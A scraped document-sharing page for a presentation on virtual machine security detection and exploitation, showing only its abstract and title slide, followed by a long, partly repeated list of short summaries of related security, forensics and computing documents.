This paper is an analysis of the current state of virtual machines’ security, showcasing how features have been turned into attack vectors that can pose threats to real enterprise level infrastructures. Despite the few real world scenarios that have actively exploited security holes, they remain one of the most dangerous threats organizations have to look out for.
How Your DRAM Becomes a Security Problemmark-smith
Since our attack methodology targets the DRAM, it is mostly independent of software flaws, operating system, virtualization technology and even CPU. The attack is based on the presence of a row buffer in all DRAM modules. While this buffer is of vital importance to the way DRAM works physically, they also provide an attack surface for a side channel attack.
This document discusses power attacks on cloud computing infrastructure. It describes how oversubscription of power capacity leaves data centers vulnerable to attacks that generate power spikes. The attacks could be launched by malicious users running intensive workloads on public servers. Experiments show how workloads can be tuned to significantly increase power consumption and potentially trip circuit breakers. Various attack vectors are explored targeting infrastructure as a service (IaaS), platform as a service (PaaS) and software as a service (SaaS). Simulations demonstrate the attacks could cause outages and damage at the data center level if launched at large scale. Mitigations are difficult due to the challenges of predicting and limiting peak power usage.
This thesis proposes a security architecture and implements a security system to secure the original WAVE mobile agent system. The security system uses a rich security model that provides principal identification and fine-grained access control. It also detects tampering of agent behavior or data. The security architecture was designed for WAVE but can generally suit any mobile intelligent system. Cryptographic techniques like hash functions and digital signatures are used. The implementation chooses Java for programming and secures the Java RMI interface. It also analyzes the performance overhead of the security system. An example application called Wavetella is discussed to demonstrate the security architecture.
Wrangling with the Ghost: An Inside Story of Mitigating Speculative Execution...Priyanka Aash
2018 started off with a bang as the world was introduced to a new class of hardware vulnerability which became known as Meltdown and Spectre. New classes of vulnerabilities are exceedingly rare and this one came with ramifications for the security boundaries that web browsers, operating systems, and cloud providers rely on for isolation to protect customer data. Now, rewind back to the summer of 2017. This disclosure and the industry response were months in the making. A new class of vulnerability comes with challenges rarely mounted and the need to pull back to examine our thinking.
In this presentation, we will describe Microsoft's approach to researching and mitigating speculative execution side channel vulnerabilities. This approach involved bringing experts from across Microsoft, hiring an industry expert to accelerate our understanding of the issues, and collaborating across the industry in a way not done previously. This team presentation between Microsoft and G DATA will provide a firsthand account of the engineering centric work done and the collaboration necessary to mitigate these issues. We will describe the taxonomy and framework we created which provided the industry foundation for reasoning about this new vulnerability class. This work built on the initial researcher reports and expanded into a larger understanding of the issues. Using this foundation, we will describe the mitigations that Microsoft developed and the impact they have on Spectre and Meltdown.
Security presentation on cracking DES
two approaches : building a machine or software , both based on brute-force
a brief look on practical challenges that broke DES
[Ruxcon 2011] Post Memory Corruption Memory AnalysisMoabi.com
The document introduces PMCMA, a debugger tool that analyzes memory corruption bugs by forcing processes to fork, overwriting memory locations in the offspring processes, and monitoring execution to map exploitable scenarios. PMCMA aims to provide a roadmap for exploitation by identifying vulnerabilities and possible exploitation techniques like truncating function pointers or exploiting 4-byte aligned memory writes. The tool is available online and has received over 10,000 downloads in its first two months.
This document summarizes a research paper that proposes a system to detect Distributed Denial of Service (DDoS) attacks on OpenStack cloud servers using XenServer virtualization and select appropriate countermeasures. The system uses Snort for intrusion detection on target virtual machines. When an attack is detected, algorithms generate an ID and select the most severe alert. Another algorithm then chooses the best countermeasure based on the attack type. The full paper provides details on implementation using tools like XenServer, OpenStack, Snort and Metasploit, as well as descriptions of the proposed detection and countermeasure selection algorithms.
This document provides a complete report on a penetration test using Kali Linux with a vulnerable machine available on Vulnhub.com. The Game of Thrones CTF: 1 (Capture The Flag) contains 11 flags in total (7 kingdom flags, 3 secret flags and one battle flag). The first chapter introduces a short description about cyber-risks and general IT security nowadays. The second chapter contains the setting for the laboratory in Oracle Virtual Box software to virtualize the attacker machine and the target machine. Furthermore, the subchapters are about the attack narrative, each one according to a specific
step-by-step location. Please notice that this walkthrough might contain spoilers to the actual TV series.
Ultimately, a comment about the vulnerabilities found in this challenge, some recommendations and the major consulted resources and used tools.
How Your DRAM Becomes a Security Problemmark-smith
Since our attack methodology targets the DRAM, it is mostly independent of software flaws, operating system, virtualization technology and even CPU. The attack is based on the presence of a row buffer in all DRAM modules. While this buffer is of vital importance to the way DRAM works physically, they also provide an attack surface for a side channel attack.
This document discusses power attacks on cloud computing infrastructure. It describes how oversubscription of power capacity leaves data centers vulnerable to attacks that generate power spikes. The attacks could be launched by malicious users running intensive workloads on public servers. Experiments show how workloads can be tuned to significantly increase power consumption and potentially trip circuit breakers. Various attack vectors are explored targeting infrastructure as a service (IaaS), platform as a service (PaaS) and software as a service (SaaS). Simulations demonstrate the attacks could cause outages and damage at the data center level if launched at large scale. Mitigations are difficult due to the challenges of predicting and limiting peak power usage.
This thesis proposes a security architecture and implements a security system to secure the original WAVE mobile agent system. The security system uses a rich security model that provides principal identification and fine-grained access control. It also detects tampering of agent behavior or data. The security architecture was designed for WAVE but can generally suit any mobile intelligent system. Cryptographic techniques like hash functions and digital signatures are used. The implementation chooses Java for programming and secures the Java RMI interface. It also analyzes the performance overhead of the security system. An example application called Wavetella is discussed to demonstrate the security architecture.
Wrangling with the Ghost: An Inside Story of Mitigating Speculative Execution...Priyanka Aash
2018 started off with a bang as the world was introduced to a new class of hardware vulnerability which became known as Meltdown and Spectre. New classes of vulnerabilities are exceedingly rare and this one came with ramifications for the security boundaries that web browsers, operating systems, and cloud providers rely on for isolation to protect customer data. Now, rewind back to the summer of 2017. This disclosure and the industry response were months in the making. A new class of vulnerability comes with challenges rarely mounted and the need to pull back to examine our thinking.
In this presentation, we will describe Microsoft's approach to researching and mitigating speculative execution side channel vulnerabilities. This approach involved bringing experts from across Microsoft, hiring an industry expert to accelerate our understanding of the issues, and collaborating across the industry in a way not done previously. This team presentation between Microsoft and G DATA will provide a firsthand account of the engineering centric work done and the collaboration necessary to mitigate these issues. We will describe the taxonomy and framework we created which provided the industry foundation for reasoning about this new vulnerability class. This work built on the initial researcher reports and expanded into a larger understanding of the issues. Using this foundation, we will describe the mitigations that Microsoft developed and the impact they have on Spectre and Meltdown.
Security presentation on cracking DES
two approaches : building a machine or software , both based on brute-force
a brief look on practical challenges that broke DES
[Ruxcon 2011] Post Memory Corruption Memory AnalysisMoabi.com
The document introduces PMCMA, a debugger tool that analyzes memory corruption bugs by forcing processes to fork, overwriting memory locations in the offspring processes, and monitoring execution to map exploitable scenarios. PMCMA aims to provide a roadmap for exploitation by identifying vulnerabilities and possible exploitation techniques like truncating function pointers or exploiting 4-byte aligned memory writes. The tool is available online and has received over 10,000 downloads in its first two months.
This document summarizes a research paper that proposes a system to detect Distributed Denial of Service (DDoS) attacks on OpenStack cloud servers using XenServer virtualization and select appropriate countermeasures. The system uses Snort for intrusion detection on target virtual machines. When an attack is detected, algorithms generate an ID and select the most severe alert. Another algorithm then chooses the best countermeasure based on the attack type. The full paper provides details on implementation using tools like XenServer, OpenStack, Snort and Metasploit, as well as descriptions of the proposed detection and countermeasure selection algorithms.
This document provides a complete report on a penetration test using Kali Linux with a vulnerable machine available on Vulnhub.com. The Game of Thrones CTF: 1 (Capture The Flag) contains 11 flags in total (7 kingdom flags, 3 secret flags and one battle flag). The first chapter introduces a short description about cyber-risks and general IT security nowadays. The second chapter contains the setting for the laboratory in Oracle Virtual Box software to virtualize the attacker machine and the target machine. Furthermore, the subchapters are about the attack narrative, each one according to a specific
step-by-step location. Please notice that this walkthrough might contain spoilers to the actual TV series.
Ultimately, a comment about the vulnerabilities found in this challenge, some recommendations and the major consulted resources and used tools.
This document discusses memory forensics and the Volatility framework. It begins by distinguishing memory forensics from disk forensics and explaining why memory forensics is needed to analyze skilled attackers and advanced malware that aim to avoid disk artifacts. It then provides an overview of Volatility capabilities for analyzing processes, network connections, code injection techniques, and decrypting software-based encryption keys from memory captures. It emphasizes that memory forensics can recover important evidence that is never written to disk.
IRJET - Analysis of Virtual Machine in Digital ForensicsIRJET Journal
This document discusses analyzing virtual machines for digital forensics purposes. It proposes a methodology for acquiring and analyzing files from VMware and Oracle VirtualBox virtual machines. The methodology has three phases: detection and acquisition of virtual machine files from the host system, analysis of virtual disk images and log files, and reporting the conclusions. The analysis phase examines virtual disk files in detail, looking at the file structure and metadata that could provide evidence. The system is implemented using Python scripts to perform the virtual machine analysis.
VxWorks - Holistic Security (Art of Testing)Aditya K Sood
The document discusses security issues related to the VxWorks operating system and firmware. It provides an overview of the VxWorks architecture and fault management system. It then analyzes vulnerabilities in the VxWorks OS security model, network stack, debugging interface, and firmware configuration. Finally, it discusses threats facing embedded devices like weak security practices.
- The document discusses building a predictive anomaly detection model for network traffic using streaming data technologies.
- It proposes using Apache Kafka to ingest and process network packet and Netflow data in real-time, and Akka clustering to build predictive models that can guide human cybersecurity experts.
- The solution aims to more effectively guide human awareness of network threats by complementing localized rule-matching with predictive modeling of aggregate network behavior based on streaming metrics.
Stuxnet is a complex malware that targeted industrial control systems in Iran. It used four zero-day exploits and spread through removable drives and local networks to find computers with Siemens Step 7 software to modify PLC code and sabotage industrial systems while avoiding detection. The malware infected over 100,000 hosts worldwide but about 60% were in Iran, its main target. It conducted five attack waves against Iranian organizations from 2009 to 2010.
The document summarizes a presentation given by Tomer Teller about the Stuxnet malware. It describes how Stuxnet infected industrial control systems by exploiting Windows vulnerabilities, spreading on removable drives, and ultimately reprogramming PLCs to sabotage Iran's nuclear program. Key infection techniques discussed include exploiting LNK and Print Spooler vulnerabilities, using autorun.inf files and rootkit techniques to propagate, and replacing DLL files to monitor and inject commands to PLCs.
Thesis Report - Gaurav Raina MSc ES - v2Gaurav Raina
This document is a master's thesis that evaluates a convolutional neural network for road speed sign detection on an Intel Xeon Phi processor. The thesis first introduces trends in computer vision like the dominance of neural networks. It then describes the research problem of high computational requirements of neural networks. The major contributions are mapping the neural network to effectively utilize the vector capabilities of the Xeon Phi through parallelization and optimization techniques. Evaluation shows speedups of over 12x can be achieved compared to single core performance.
Deep Convolutional Neural Network acceleration on the Intel Xeon PhiGaurav Raina
This document is a master's thesis that evaluates a convolutional neural network for road speed sign detection on an Intel Xeon Phi processor. The thesis first describes trends in computer vision and the challenges of implementing neural networks in real-time on embedded platforms. It then presents an implementation of a convolutional neural network for speed sign detection in C and initial experiments on an Intel Core i7 processor. The thesis goes on to evaluate mappings of the convolutional network to vectorize computations on the Core i7 and Xeon Phi in order to improve performance and enable real-time embedded implementation. Speedups of over 12x are achieved through the use of low-level vector intrinsics.
Deep Convolutional Network evaluation on the Intel Xeon PhiGaurav Raina
With a sharp decline in camera cost and size along with superior computing power available at increasingly low prices, computer vision applications are becoming ever present in our daily lives. Research shows that Convolutional Neural Networks (ConvNet) can outperform all other methods for
computer vision tasks (such as object detection) in terms of accuracy and versatility.
One of the problems with these Neural Networks, which mimic the brain, is that they can be very demanding on the processor, requiring millions of computational nodes to function. Hence, it is challenging for Neural Network
algorithms to achieve real-time performance on general purpose embedded platforms.
Parallelization and vectorization are very eective ways to ease this problem and make it possible to implement such ConvNets on energy efficient embedded platforms. This thesis presents the evaluation of a novel ConvNet for road speed sign detection, on a breakthrough 57-core Intel Xeon Phi
processor with 512-bit vector support. This mapping demonstrates that the parallelism inherent in the ConvNet algorithm can be effectively exploited by the 512-bit vector ISA and by utilizing the many core paradigm.
Detailed evaluation shows that the best mappings require data-reuse strategies that exploit reuse at the cache and register level. These implementations are boosted by the use of low-level vector intrinsics (which are
C style functions that map directly onto many Intel assembly instructions).
Ultimately we demonstrate an approach which can be used to accelerate Neural Networks on highly-parallel many core processors, with execution speedups of more than 12x on single core performance alone.
The document provides details on the Backoff malware including:
- It infects point of sale systems to steal credit card data which is sent to a command and control server.
- Keylogging and memory scraping are used to harvest track 1 and 2 data from cards.
- The C&C infrastructure uses proxies and authentication to hide the real server location and survives takedowns.
- Analysis of version timestamps suggests the malware operator does development late at night.
The document summarizes analysis of the Backoff point-of-sale malware. It describes how Backoff infects systems by installing itself as a hidden file and adding registry keys to run on startup. It then uses keylogging and memory scraping to harvest track 1 and 2 data from payment card magnetic strips. This data is sent to a command and control server via HTTP requests every 45 seconds along with system information. The keylogger records data from keyboards with integrated card readers, making it a more effective method than memory scraping alone.
This document provides a vulnerability assessment report for a network called the Grey Network. It analyzes vulnerabilities found on 3 machines with IP addresses 172.31.106.13, 172.31.106.90, and 172.31.106.196. The report found critical vulnerabilities on all machines from outdated operating systems and software. Specific issues included an unencrypted Telnet server, outdated Apache and OpenSSL versions, and Windows XP past its end of life. Scanning tools like Nmap, Nikto, and Nessus were used to detect these vulnerabilities. The report recommends patching all systems, updating to current versions, and disabling insecure services.
I will talk about innovation in the area of cyber security analytics - developing machine learning methods to detect and block cyber attacks (e.g. detecting ransomware within 4 seconds of execution and killing the underlying processes). Rather than just focusing on this as a 'black box', I'll pull it apart and talk about how we can use these methods to enable security practitioners (SOC/CIRT etc) to ask and answer questions about 'what' and 'why' these methods are flagging attacks. I'll also talk about resilience of machine learning methods to manipulation and adversarial attacks - how stable these approaches are to diversity and evolution of malware for example.
A Network Intrusion Detection System (NIDS) monitors a network for malicious activities or policy violations [1]. The Kernel-based Virtual Machine (KVM) is a full virtualization solution for Linux on x86 hardware virtualization extensions [2]. We design and implement a back-propagation network intrusion detection system in KVM. Compared to traditional Back Propagation (BP) NIDS, the Particle Swarm Optimization (PSO) algorithm is applied to improve efficiency. The results show an improved system in terms of recall and precision along with missing detection rates.
The lies we tell our code, LinuxCon/CloudOpen 2015-08-18Casey Bisson
As presented at LinuxCon/CloudOpen 2015: http://sched.co/3Y3v
We tell our code lies from development to deploy. The most common of these lies start with the simple act of launching a virtual machine. These lies are critical to our applications. Some of them protect applications from themselves and each other, some even improve performance. Some, however, decrease performance, and others create barriers to simply getting things done.
We lie about the systems, networks, storage, RAM, CPU and other resources our applications use, but how we tell those lies is critical to how the applications that depend on them perform. Joyent's Casey Bisson will explore the lies we tell our code and demonstrate examples of how they sometimes help and hurt us.
Docker, Linux Containers, and Security: Does It Add Up?Jérôme Petazzoni
Containers are becoming increasingly popular. They have many advantages over virtual machines: they boot faster, have less performance overhead, and use less resources. However, those advantages also stem from the fact that containers share the kernel of their host, instead of abstracting an new independent environment. This sharing has significant security implications, as kernel exploits can now lead to host-wide escalations.
In this presentation, we will:
- Review the actual security risks, in particular for multi-tenant environments running arbitrary applications and code
- Discuss how to mitigate those risks
- Focus on containers as implemented by Docker and the libcontainer project, but the discussion also stands for plain containers as implemented by LXC
This document presents research on inducing faults in an ARM9 general purpose CPU through undervolting. It characterizes the fault model and induced errors. It is shown that undervolting gradually increases faulty computations. In a specific voltage range, most faulty computations are caused by single faults. Experimental attacks are presented on AES and RSA implementations, validating the practical ability to break ciphers with this fault injection technique. For AES, a new key recovery attack is presented. For RSA, a new plaintext recovery attack from a correct and faulty ciphertext is shown.
Here are three additional new security tools or techniques beyond what was discussed in the text, along with an analysis of their potential:
1. Deception technologies: Tools that deploy deceptive measures like honeypots, honeynets, and decoy documents/credentials to identify and study cyber attacks without putting real systems at risk. These have strong potential to gather threat intelligence and improve defenses.
2. Blockchain authentication: Using distributed ledger technologies like blockchain to securely store credentials and authenticate users. By distributing credential data across multiple nodes, it eliminates single points of failure and could help reduce identity theft if widely adopted.
3. AI-powered behavioral analytics: Leveraging machine learning to analyze patterns in user and system behavior over time
Laporan Praktikum Keamanan Siber - Tugas 1 - Kelas C - Kelompok 3.pdfIGedeArieYogantaraSu
The document summarizes a virtual machine installation lab. It discusses:
1) Downloading and installing Oracle VirtualBox to run virtual machines on the host computer.
2) Downloading a pre-configured virtual machine image file to use for cybersecurity labs.
3) Importing the virtual machine image into VirtualBox and starting the virtual machine to access lab applications.
This presentation provides valuable insights into effective cost-saving techniques on AWS. Learn how to optimize your AWS resources by rightsizing, increasing elasticity, picking the right storage class, and choosing the best pricing model. Additionally, discover essential governance mechanisms to ensure continuous cost efficiency. Whether you are new to AWS or an experienced user, this presentation provides clear and practical tips to help you reduce your cloud costs and get the most out of your budget.
Skybuffer SAM4U tool for SAP license adoptionTatiana Kojar
Manage and optimize your license adoption and consumption with SAM4U, an SAP free customer software asset management tool.
SAM4U, an SAP complimentary software asset management tool for customers, delivers a detailed and well-structured overview of license inventory and usage with a user-friendly interface. We offer a hosted, cost-effective, and performance-optimized SAM4U setup in the Skybuffer Cloud environment. You retain ownership of the system and data, while we manage the ABAP 7.58 infrastructure, ensuring fixed Total Cost of Ownership (TCO) and exceptional services through the SAP Fiori interface.
More Related Content
Similar to Virtual Machines Security Internals: Detection and Exploitation
This document discusses memory forensics and the Volatility framework. It begins by distinguishing memory forensics from disk forensics and explaining why memory forensics is needed to analyze skilled attackers and advanced malware that aim to avoid disk artifacts. It then provides an overview of Volatility capabilities for analyzing processes, network connections, code injection techniques, and decrypting software-based encryption keys from memory captures. It emphasizes that memory forensics can recover important evidence that is never written to disk.
IRJET - Analysis of Virtual Machine in Digital ForensicsIRJET Journal
This document discusses analyzing virtual machines for digital forensics purposes. It proposes a methodology for acquiring and analyzing files from VMware and Oracle VirtualBox virtual machines. The methodology has three phases: detection and acquisition of virtual machine files from the host system, analysis of virtual disk images and log files, and reporting the conclusions. The analysis phase examines virtual disk files in detail, looking at the file structure and metadata that could provide evidence. The system is implemented using Python scripts to perform the virtual machine analysis.
VxWorks - Holistic Security (Art of Testing)Aditya K Sood
The document discusses security issues related to the VxWorks operating system and firmware. It provides an overview of the VxWorks architecture and fault management system. It then analyzes vulnerabilities in the VxWorks OS security model, network stack, debugging interface, and firmware configuration. Finally, it discusses threats facing embedded devices like weak security practices.
- The document discusses building a predictive anomaly detection model for network traffic using streaming data technologies.
- It proposes using Apache Kafka to ingest and process network packet and Netflow data in real-time, and Akka clustering to build predictive models that can guide human cybersecurity experts.
- The solution aims to more effectively guide human awareness of network threats by complementing localized rule-matching with predictive modeling of aggregate network behavior based on streaming metrics.
Stuxnet is a complex malware that targeted industrial control systems in Iran. It used four zero-day exploits and spread through removable drives and local networks to find computers with Siemens Step 7 software to modify PLC code and sabotage industrial systems while avoiding detection. The malware infected over 100,000 hosts worldwide but about 60% were in Iran, its main target. It conducted five attack waves against Iranian organizations from 2009 to 2010.
The document summarizes a presentation given by Tomer Teller about the Stuxnet malware. It describes how Stuxnet infected industrial control systems by exploiting Windows vulnerabilities, spreading on removable drives, and ultimately reprogramming PLCs to sabotage Iran's nuclear program. Key infection techniques discussed include exploiting LNK and Print Spooler vulnerabilities, using autorun.inf files and rootkit techniques to propagate, and replacing DLL files to monitor and inject commands to PLCs.
Thesis Report - Gaurav Raina MSc ES - v2Gaurav Raina
This document is a master's thesis that evaluates a convolutional neural network for road speed sign detection on an Intel Xeon Phi processor. The thesis first introduces trends in computer vision like the dominance of neural networks. It then describes the research problem of high computational requirements of neural networks. The major contributions are mapping the neural network to effectively utilize the vector capabilities of the Xeon Phi through parallelization and optimization techniques. Evaluation shows speedups of over 12x can be achieved compared to single core performance.
Deep Convolutional Neural Network acceleration on the Intel Xeon PhiGaurav Raina
This document is a master's thesis that evaluates a convolutional neural network for road speed sign detection on an Intel Xeon Phi processor. The thesis first describes trends in computer vision and the challenges of implementing neural networks in real-time on embedded platforms. It then presents an implementation of a convolutional neural network for speed sign detection in C and initial experiments on an Intel Core i7 processor. The thesis goes on to evaluate mappings of the convolutional network to vectorize computations on the Core i7 and Xeon Phi in order to improve performance and enable real-time embedded implementation. Speedups of over 12x are achieved through the use of low-level vector intrinsics.
Deep Convolutional Network evaluation on the Intel Xeon PhiGaurav Raina
With a sharp decline in camera cost and size along with superior computing power available at increasingly low prices, computer vision applications are becoming ever present in our daily lives. Research shows that Convolutional Neural Networks (ConvNet) can outperform all other methods for
computer vision tasks (such as object detection) in terms of accuracy and versatility.
One of the problems with these Neural Networks, which mimic the brain, is that they can be very demanding on the processor, requiring millions of computational nodes to function. Hence, it is challenging for Neural Network
algorithms to achieve real-time performance on general purpose embedded platforms.
Parallelization and vectorization are very eective ways to ease this problem and make it possible to implement such ConvNets on energy efficient embedded platforms. This thesis presents the evaluation of a novel ConvNet for road speed sign detection, on a breakthrough 57-core Intel Xeon Phi
processor with 512-bit vector support. This mapping demonstrates that the parallelism inherent in the ConvNet algorithm can be effectively exploited by the 512-bit vector ISA and by utilizing the many core paradigm.
Detailed evaluation shows that the best mappings require data-reuse strategies that exploit reuse at the cache and register level. These implementations are boosted by the use of low-level vector intrinsics (which are
C style functions that map directly onto many Intel assembly instructions).
Ultimately we demonstrate an approach which can be used to accelerate Neural Networks on highly-parallel many core processors, with execution speedups of more than 12x on single core performance alone.
The document provides details on the Backoff malware including:
- It infects point of sale systems to steal credit card data which is sent to a command and control server.
- Keylogging and memory scraping are used to harvest track 1 and 2 data from cards.
- The C&C infrastructure uses proxies and authentication to hide the real server location and survives takedowns.
- Analysis of version timestamps suggests the malware operator does development late at night.
The document summarizes analysis of the Backoff point-of-sale malware. It describes how Backoff infects systems by installing itself as a hidden file and adding registry keys to run on startup. It then uses keylogging and memory scraping to harvest track 1 and 2 data from payment card magnetic strips. This data is sent to a command and control server via HTTP requests every 45 seconds along with system information. The keylogger records data from keyboards with integrated card readers, making it a more effective method than memory scraping alone.
This document provides a vulnerability assessment report for a network called the Grey Network. It analyzes vulnerabilities found on 3 machines with IP addresses 172.31.106.13, 172.31.106.90, and 172.31.106.196. The report found critical vulnerabilities on all machines from outdated operating systems and software. Specific issues included an unencrypted Telnet server, outdated Apache and OpenSSL versions, and Windows XP past its end of life. Scanning tools like Nmap, Nikto, and Nessus were used to detect these vulnerabilities. The report recommends patching all systems, updating to current versions, and disabling insecure services.
I will talk about innovation in the area of cyber security analytics - developing machine learning methods to detect and block cyber attacks (e.g. detecting ransomware within 4 seconds of execution and killing the underlying processes). Rather than just focusing on this as a 'black box', I'll pull it apart and talk about how we can use these methods to enable security practitioners (SOC/CIRT etc) to ask and answer questions about 'what' and 'why' these methods are flagging attacks. I'll also talk about resilience of machine learning methods to manipulation and adversarial attacks - how stable these approaches are to diversity and evolution of malware for example.
A Network Intrusion Detection System (NIDS) monitors a network for malicious activities or policy violations [1]. The Kernel-based Virtual Machine (KVM) is a full virtualization solution for Linux on x86 hardware virtualization extensions [2]. We design and implement a back-propagation network intrusion detection system in KVM. Compared to traditional Back Propagation (BP) NIDS, the Particle Swarm Optimization (PSO) algorithm is applied to improve efficiency. The results show an improved system in terms of recall and precision along with missing detection rates.
The lies we tell our code, LinuxCon/CloudOpen 2015-08-18Casey Bisson
As presented at LinuxCon/CloudOpen 2015: http://sched.co/3Y3v
We tell our code lies from development to deploy. The most common of these lies start with the simple act of launching a virtual machine. These lies are critical to our applications. Some of them protect applications from themselves and each other, some even improve performance. Some, however, decrease performance, and others create barriers to simply getting things done.
We lie about the systems, networks, storage, RAM, CPU and other resources our applications use, but how we tell those lies is critical to how the applications that depend on them perform. Joyent's Casey Bisson will explore the lies we tell our code and demonstrate examples of how they sometimes help and hurt us.
Docker, Linux Containers, and Security: Does It Add Up?Jérôme Petazzoni
Containers are becoming increasingly popular. They have many advantages over virtual machines: they boot faster, have less performance overhead, and use less resources. However, those advantages also stem from the fact that containers share the kernel of their host, instead of abstracting an new independent environment. This sharing has significant security implications, as kernel exploits can now lead to host-wide escalations.
In this presentation, we will:
- Review the actual security risks, in particular for multi-tenant environments running arbitrary applications and code
- Discuss how to mitigate those risks
- Focus on containers as implemented by Docker and the libcontainer project, but the discussion also stands for plain containers as implemented by LXC
This document presents research on inducing faults in an ARM9 general purpose CPU through undervolting. It characterizes the fault model and induced errors. It is shown that undervolting gradually increases faulty computations. In a specific voltage range, most faulty computations are caused by single faults. Experimental attacks are presented on AES and RSA implementations, validating the practical ability to break ciphers with this fault injection technique. For AES, a new key recovery attack is presented. For RSA, a new plaintext recovery attack from a correct and faulty ciphertext is shown.
Here are three additional new security tools or techniques beyond what was discussed in the text, along with an analysis of their potential:
1. Deception technologies: Tools that deploy deceptive measures like honeypots, honeynets, and decoy documents/credentials to identify and study cyber attacks without putting real systems at risk. These have strong potential to gather threat intelligence and improve defenses.
2. Blockchain authentication: Using distributed ledger technologies like blockchain to securely store credentials and authenticate users. By distributing credential data across multiple nodes, it eliminates single points of failure and could help reduce identity theft if widely adopted.
3. AI-powered behavioral analytics: Leveraging machine learning to analyze patterns in user and system behavior over time
Laporan Praktikum Keamanan Siber - Tugas 1 - Kelas C - Kelompok 3.pdfIGedeArieYogantaraSu
The document summarizes a virtual machine installation lab. It discusses:
1) Downloading and installing Oracle VirtualBox to run virtual machines on the host computer.
2) Downloading a pre-configured virtual machine image file to use for cybersecurity labs.
3) Importing the virtual machine image into VirtualBox and starting the virtual machine to access lab applications.
Similar to Virtual Machines Security Internals: Detection and Exploitation (20)
This presentation provides valuable insights into effective cost-saving techniques on AWS. Learn how to optimize your AWS resources by rightsizing, increasing elasticity, picking the right storage class, and choosing the best pricing model. Additionally, discover essential governance mechanisms to ensure continuous cost efficiency. Whether you are new to AWS or an experienced user, this presentation provides clear and practical tips to help you reduce your cloud costs and get the most out of your budget.
Skybuffer SAM4U tool for SAP license adoptionTatiana Kojar
Manage and optimize your license adoption and consumption with SAM4U, an SAP free customer software asset management tool.
SAM4U, an SAP complimentary software asset management tool for customers, delivers a detailed and well-structured overview of license inventory and usage with a user-friendly interface. We offer a hosted, cost-effective, and performance-optimized SAM4U setup in the Skybuffer Cloud environment. You retain ownership of the system and data, while we manage the ABAP 7.58 infrastructure, ensuring fixed Total Cost of Ownership (TCO) and exceptional services through the SAP Fiori interface.
TrustArc Webinar - 2024 Global Privacy SurveyTrustArc
How does your privacy program stack up against your peers? What challenges are privacy teams tackling and prioritizing in 2024?
In the fifth annual Global Privacy Benchmarks Survey, we asked over 1,800 global privacy professionals and business executives to share their perspectives on the current state of privacy inside and outside of their organizations. This year’s report focused on emerging areas of importance for privacy and compliance professionals, including considerations and implications of Artificial Intelligence (AI) technologies, building brand trust, and different approaches for achieving higher privacy competence scores.
See how organizational priorities and strategic approaches to data security and privacy are evolving around the globe.
This webinar will review:
- The top 10 privacy insights from the fifth annual Global Privacy Benchmarks Survey
- The top challenges for privacy leaders, practitioners, and organizations in 2024
- Key themes to consider in developing and maintaining your privacy program
zkStudyClub - LatticeFold: A Lattice-based Folding Scheme and its Application...Alex Pruden
Folding is a recent technique for building efficient recursive SNARKs. Several elegant folding protocols have been proposed, such as Nova, Supernova, Hypernova, Protostar, and others. However, all of them rely on an additively homomorphic commitment scheme based on discrete log, and are therefore not post-quantum secure. In this work we present LatticeFold, the first lattice-based folding protocol based on the Module SIS problem. This folding protocol naturally leads to an efficient recursive lattice-based SNARK and an efficient PCD scheme. LatticeFold supports folding low-degree relations, such as R1CS, as well as high-degree relations, such as CCS. The key challenge is to construct a secure folding protocol that works with the Ajtai commitment scheme. The difficulty, is ensuring that extracted witnesses are low norm through many rounds of folding. We present a novel technique using the sumcheck protocol to ensure that extracted witnesses are always low norm no matter how many rounds of folding are used. Our evaluation of the final proof system suggests that it is as performant as Hypernova, while providing post-quantum security.
Paper Link: https://eprint.iacr.org/2024/257
Best 20 SEO Techniques To Improve Website Visibility In SERPPixlogix Infotech
Boost your website's visibility with proven SEO techniques! Our latest blog dives into essential strategies to enhance your online presence, increase traffic, and rank higher on search engines. From keyword optimization to quality content creation, learn how to make your site stand out in the crowded digital landscape. Discover actionable tips and expert insights to elevate your SEO game.
leewayhertz.com-AI in predictive maintenance Use cases technologies benefits ...alexjohnson7307
Predictive maintenance is a proactive approach that anticipates equipment failures before they happen. At the forefront of this innovative strategy is Artificial Intelligence (AI), which brings unprecedented precision and efficiency. AI in predictive maintenance is transforming industries by reducing downtime, minimizing costs, and enhancing productivity.
Introduction of Cybersecurity with OSS at Code Europe 2024Hiroshi SHIBATA
I develop the Ruby programming language, RubyGems, and Bundler, which are package managers for Ruby. Today, I will introduce how to enhance the security of your application using open-source software (OSS) examples from Ruby and RubyGems.
The first topic is CVE (Common Vulnerabilities and Exposures). I have published CVEs many times. But what exactly is a CVE? I'll provide a basic understanding of CVEs and explain how to detect and handle vulnerabilities in OSS.
Next, let's discuss package managers. Package managers play a critical role in the OSS ecosystem. I'll explain how to manage library dependencies in your application.
I'll share insights into how the Ruby and RubyGems core team works to keep our ecosystem safe. By the end of this talk, you'll have a better understanding of how to safeguard your code.
How to Interpret Trends in the Kalyan Rajdhani Mix Chart.pdfChart Kalyan
A Mix Chart displays historical data of numbers in a graphical or tabular form. The Kalyan Rajdhani Mix Chart specifically shows the results of a sequence of numbers over different periods.
Let's Integrate MuleSoft RPA, COMPOSER, APM with AWS IDP along with Slackshyamraj55
Discover the seamless integration of RPA (Robotic Process Automation), COMPOSER, and APM with AWS IDP enhanced with Slack notifications. Explore how these technologies converge to streamline workflows, optimize performance, and ensure secure access, all while leveraging the power of AWS IDP and real-time communication via Slack notifications.
Building Production Ready Search Pipelines with Spark and MilvusZilliz
Spark is the widely used ETL tool for processing, indexing and ingesting data to serving stack for search. Milvus is the production-ready open-source vector database. In this talk we will show how to use Spark to process unstructured data to extract vector representations, and push the vectors to Milvus vector database for search serving.
Your One-Stop Shop for Python Success: Top 10 US Python Development Providersakankshawande
Simplify your search for a reliable Python development partner! This list presents the top 10 trusted US providers offering comprehensive Python development services, ensuring your project's success from conception to completion.
Digital Banking in the Cloud: How Citizens Bank Unlocked Their MainframePrecisely
Inconsistent user experience and siloed data, high costs, and changing customer expectations – Citizens Bank was experiencing these challenges while it was attempting to deliver a superior digital banking experience for its clients. Its core banking applications run on the mainframe and Citizens was using legacy utilities to get the critical mainframe data to feed customer-facing channels, like call centers, web, and mobile. Ultimately, this led to higher operating costs (MIPS), delayed response times, and longer time to market.
Ever-changing customer expectations demand more modern digital experiences, and the bank needed to find a solution that could provide real-time data to its customer channels with low latency and operating costs. Join this session to learn how Citizens is leveraging Precisely to replicate mainframe data to its customer channels and deliver on their “modern digital bank” experiences.
Digital Banking in the Cloud: How Citizens Bank Unlocked Their Mainframe
Virtual Machines Security Internals: Detection and Exploitation
1. Dipartimento di Informatica
Sicurezza dei Sistemi e delle Reti Informatiche
Virtual Machines Security Internals:
